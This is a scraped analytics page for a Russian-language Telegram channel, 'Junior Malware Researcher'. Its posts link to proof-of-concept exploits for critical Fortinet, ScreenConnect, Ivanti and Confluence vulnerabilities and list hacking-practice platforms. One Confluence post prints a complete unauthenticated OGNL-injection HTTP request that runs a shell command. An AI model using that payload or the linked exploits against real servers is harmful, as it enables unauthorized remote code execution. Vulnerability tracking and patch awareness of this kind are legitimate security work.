en
Feedback
Junior Malware Researcher

Junior Malware Researcher

Open in Telegram
313
Subscribers
+224 hours
+127 days
+3130 days

Data loading in progress...

Tags Cloud
No data
Any problems? Please refresh the page or contact our support manager.
Incoming and Outgoing Mentions
---
---
---
---
---
---
Attracting Subscribers
September '24
September '24
+27
in 0 channels
August '24
+52
in 0 channels
Get PRO
July '24
+44
in 0 channels
Get PRO
June '24
+39
in 0 channels
Get PRO
May '24
+64
in 0 channels
Get PRO
April '24
+148
in 1 channels
Get PRO
March '240
in 0 channels
Get PRO
February '24
+2
in 0 channels
Get PRO
January '24
+169
in 0 channels
Get PRO
December '23
+194
in 0 channels
Date
Subscriber Growth
Mentions
Channels
25 September0
24 September0
23 September+1
22 September0
21 September+3
20 September0
19 September0
18 September+1
17 September+1
16 September0
15 September0
14 September+1
13 September+2
12 September0
11 September+2
10 September+1
09 September0
08 September+2
07 September+3
06 September+2
05 September+4
04 September0
03 September+3
02 September0
01 September+1
Channel Posts
CVE-2024-21762: Fortinet FortiOS и FortiProxy «sslvpnd» — удаленное выполнение кода без проверки подлинности (OOB) 😈 POC : https://github.com/h4x0r-dz/CVE-2024-21762 . ❗️ Версия: https://www.fortiguard.com/psirt/FG-IR-24-015 . 🟢 Блог/POC: https://www.assetnote.io/resources/research/two-bytes-is-plenty-fortigate-rce-with-cve-2024-21762

2
:-(
304
3
https://netacad.sadlab.su/
518
4
🔥CVE-2024-1709 : ConnectWise SecureConnect <= 23.9.7 - Authentication Bypass & Unauthenticated Remote Code Execution
🔥CVE-2024-1709 : ConnectWise SecureConnect <= 23.9.7  - Authentication Bypass & Unauthenticated Remote Code Execution module (Updated) 🟢POC : https://github.com/horizon3ai/SecureConnect-Auth-Bypass [2] , [3] 📺Blog : https://www.horizon3.ai/attack-research/red-team/connectwise-screenconnect-auth-bypass-deep-dive/ ☠️Analysis (CVE-2024-1709 & CVE-2024-1708) :  https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass 🔥Module RCE : https://github.com/rapid7/metasploit-framework/pull/18870
522
5
▪️ Hack The Box - win, *nix машины для самостоятельного взлома. Во free всегда доступно 20 машин. Обучение, академия, лабы и
▪️ Hack The Box - win, *nix машины для самостоятельного взлома. Во free всегда доступно 20 машин. Обучение, академия, лабы и т.д. ▪️ TryHackMe - аналог HTB ▪️ PortSwigger - академия веб пентеста от создателей BurpSuite ▪️ CTFtime - почти все CTF соревнования можно найти здесь ▪️ Codeby.games - Русскоязычная площадка. CTF задачи в различных категориях ▪️ CryptoHack - нравится криптография ? Вам сюда, от азов до сложнейших задач ▪️ Kontra - appsec тренировки, owasp top10, owasp api top10, aws top10 и т.д. ▪️ Linux Journey - путешествие в мир Linux, основные команды, лабы, руководства ▪️ OverTheWire Bandit - игра из 34 уровней для изучения Linux ▪️ Crackmes one - большое количество крякми для изучения. Подойдет реверсерам ▪️ pwnable tw - для любителей бинарной эксплуатации (PWN)
374
6
fbi.gov_ru.txt
315
7
+1
No text...
326
8
я пока еще отдыхаю, сладкие мои❤️ чуть позже чат открою, как было все
331
9
No text...
151
10
🔥CVE-2024-22024 : Ivanti Connect Secure 9.x, 22.x & Ivanti Policy Secure 9.x, 22.x & ZTA Gateways 22.6R1.3 'SAML Component'
🔥CVE-2024-22024 : Ivanti Connect Secure 9.x, 22.x & Ivanti Policy Secure 9.x, 22.x & ZTA Gateways 22.6R1.3 'SAML Component' - Unauthenticated XML External Entity (XXE) 🟢POC N/A : https://github.com/0dteam/CVE-2024-22024 🔥CVE-2023-46805 : Ivanti Connect Secure 9.x, 22.x & Ivanti Policy Secure 9.x, 22.x 'Web Component' - Authentication Bypass 🟢SCAN : https://github.com/Chocapikk/CVE-2023-46805 🔥CVE-2024-21887 : Ivanti Connect Secure 9.x, 22.x & Ivanti Policy Secure 9.x, 22.x 'Web Component' - (Authenticated Administrator) Arbitrary Command Execution 🟢POC N/A : https://github.com/imhunterand/CVE-2024-21887 🤩High Signal Detection and Exploitation of Ivanti's Pulse Connect Secure Auth Bypass & RCE ➡️Blog : https://www.assetnote.io/resources/research/high-signal-detection-and-exploitation-of-ivantis-pulse-connect-secure-auth-bypass-rce
153
11
ГОТОВЫ ?
141
12
НУ ЧЕ ЕБАТЬ
140
13
скачал себе циско крч, займу себя делом
274
14
оставил чисто для того, чтобы каждый взял от сюда то, что ему(ей) нужно
94
15
да, думаю и так все понятно
89
16
reviOS vs Wizard
765
17
Детали уязвимости CVE-2023-22527 (оценка по CVSS3.0=10), позволяющей получить RCE в Atlassian Confluence известны уже пару дней, но не все почему-то спешат обновлять свои сервера. 🤷‍♂️ Согласно данным Censys, которые обновляются ежедневно в отношении всего пространства IPv4, в нашей стране на сегодняшний день~3.6k скомпрометированных торчащих в интернет серверов Confluence. Технические детали уязвимости опубликованы в блоге ProjectDiscovery, эксплуатация позволяет не аутентифицированному злоумышленнику получить возможность исполнения произвольного кода путем SSTI инъекции OGNL (Object-Graph Navigation Language) POST /template/aui/text-inline.vm HTTP/1.1 Host: сonfluence:8090 Accept-Encoding: gzip, deflate, br Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36 Connection: close Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Content-Length: 285 label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"})) ⚙️POC: https://github.com/VNCERT-CC/CVE-2023-22527-confluence 🪲Уязвимые версии ПО: 8.0.x - 8.5.3 ✅ Рекомендации: Патч уже доступен, необходимо ASAP обновиться до версии 8.5.3 #confluence #CVE-2023-22527
795
18
🔥🔥🔥CVE-2023-22527 : Atlassian Confluence 8.0.x - Unauthenticated Remote Code Execution (inject OGNL) 🟢POC / Blog : https:
🔥🔥🔥CVE-2023-22527 : Atlassian Confluence 8.0.x - Unauthenticated Remote Code Execution (inject OGNL) 🟢POC / Blog : https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/ 🟥NIST : https://nvd.nist.gov/vuln/detail/CVE-2023-22527
596
19
sticker.webp
638
20
sticker.webp
710